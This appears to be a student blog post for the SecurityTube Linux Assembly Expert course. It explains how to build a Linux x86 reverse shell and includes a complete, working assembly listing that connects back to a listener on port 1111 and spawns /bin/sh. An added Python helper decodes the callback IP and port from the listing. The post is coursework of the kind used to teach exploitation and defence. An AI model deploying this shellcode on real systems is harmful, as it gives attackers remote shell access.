SLAE Assignment 2 - Reverse Shell
Objective:
The objective of the assignment is to create a reverse shell which connects back to the listener and spawns a shell.
Steps
1.) Identify the system calls required
2.) Create the Assembly code
3.) Test the compiled binary and create wrapper script
Step1
The major difference between a bind shell and a reverse shell is that we don't need to bind an IP and port to the socket we create; instead we use connect to shovel a shell back to the listener. A reverse shell is very useful when a firewall filters incoming connections. The system calls used are:
a. Socket
As usual we create a socket which will be used later to connect.
b. Connect
We use the connect system call to connect to the target IP and port.
c. Dup2
Just like in the bind shell we use dup2 to redirect stdin, stdout and stderr to the created socket.
d. Execve
Finally execve is used to execute /bin/sh; because its standard descriptors now point at the socket, the shell is shoveled back to the listening IP and port.
Step2
The next step is to create the assembly code with the above mentioned system calls.
global _start

section .text

_start:

    addr: equ 0x0101017F        ; ip = 127.1.1.1 (bytes 7F 01 01 01 once pushed)
    port: equ 0x5704            ; port = 1111 (0x0457 in network byte order)

    ; socket(AF_INET, SOCK_STREAM, 0) via socketcall(SYS_SOCKET, args)
    cdq                         ; edx = 0 (eax is 0 at process start)
    push 0x66                   ; socketcall()
    pop eax
    push edx                    ; protocol = 0
    inc edx
    push edx                    ; SOCK_STREAM = 1
    mov ebx, edx                ; SYS_SOCKET = 1
    inc edx
    push edx                    ; AF_INET = 2
    mov ecx, esp                ; ecx -> args array
    int 0x80                    ; call socketcall(); eax = sockfd

    ; dup2(sockfd, fd) for fd = 2, 1, 0   -- int dup2(int oldfd, int newfd)
    xchg ebx, eax               ; ebx = sockfd
    mov ecx, edx                ; ecx = 2 (stderr first)
loop4dup:
    mov al, 0x3f                ; dup2()
    int 0x80
    dec ecx
    jns loop4dup                ; repeat until ecx goes negative

    ; connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr))
    mov al, 0x66                ; socketcall()
    xchg ebx, edx               ; ebx = 2, edx = sockfd
    push addr                   ; sin_addr = 127.1.1.1
    push word port              ; sin_port = 1111
    push word bx                ; sin_family = AF_INET
    inc ebx                     ; SYS_CONNECT = 3
    mov ecx, esp                ; ecx -> serv_addr
    push 0x10                   ; sizeof(serv_addr) = 16
    push ecx                    ; &serv_addr
    push edx                    ; sockfd
    mov ecx, esp                ; ecx -> args array
    int 0x80                    ; call socketcall()

    ; execve("/bin/sh", NULL, NULL)
    push BYTE 11                ; execve()
    pop eax
    cdq                         ; edx = 0 -> envp = NULL
    mov ecx, edx                ; argv = NULL
    push edx                    ; NUL terminator for the string
    push 0x68732f2f             ; "//sh"
    push 0x6e69622f             ; "/bin"
    mov ebx, esp                ; ebx -> "/bin//sh"
    int 0x80                    ; call execve()
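As an added example (not part of the original post), a small Python helper an analyst can use to recover the connect-back target from the two equ constants in a listing like the one above, applying the byte-order rules the comments describe: push addr stores the dword little-endian so its low byte becomes the first octet of sin_addr, and push word port stores the 16-bit value little-endian while sin_port is read in network byte order. ASM_SNIPPET is a constructed copy of just those two lines.

```python
import re
import struct

# Constructed copy of the two constants from the listing (not the full shellcode).
ASM_SNIPPET = """
addr: equ 0x0101017F ; ip = 127.1.1.1
port: equ 0x5704 ; port= 1111
"""

# Matches "name: equ value" or "name equ value"; value may be hex or decimal.
EQU_RE = re.compile(r"^\s*(\w+):?\s+equ\s+(0x[0-9a-fA-F]+|\d+)", re.M | re.I)


def decode_addr(addr_const: int) -> str:
    """The dword is pushed little-endian, so the low byte is the first octet."""
    return ".".join(str(b) for b in struct.pack("<I", addr_const & 0xFFFFFFFF))


def decode_port(port_const: int) -> int:
    """Two bytes pushed little-endian are read back as big-endian sin_port."""
    return struct.unpack(">H", struct.pack("<H", port_const & 0xFFFF))[0]


def find_equ_constants(asm_text: str) -> dict:
    """Collect every equ constant in the listing as {name: int}."""
    return {m.group(1): int(m.group(2), 0) for m in EQU_RE.finditer(asm_text)}


def callback_target(asm_text: str) -> tuple:
    """Return (ip, port) the shellcode connects back to, or raise if absent."""
    consts = find_equ_constants(asm_text)
    for name in ("addr", "port"):
        if name not in consts:
            raise ValueError(f"listing has no '{name}' equ constant")
    return decode_addr(consts["addr"]), decode_port(consts["port"])


if __name__ == "__main__":
    print(callback_target(ASM_SNIPPET))
```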
Step3
The next step is to assemble, compile and test the shellcode.
As usual we create the object file and then link it to create the binary. Then we extract the opcodes for the shellcode using the trick learned from SLAE and test them in the shellcode test program.
Finally the binary is executed and we can see that the shellcode worked as expected, with a reverse connection obtained.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE – 739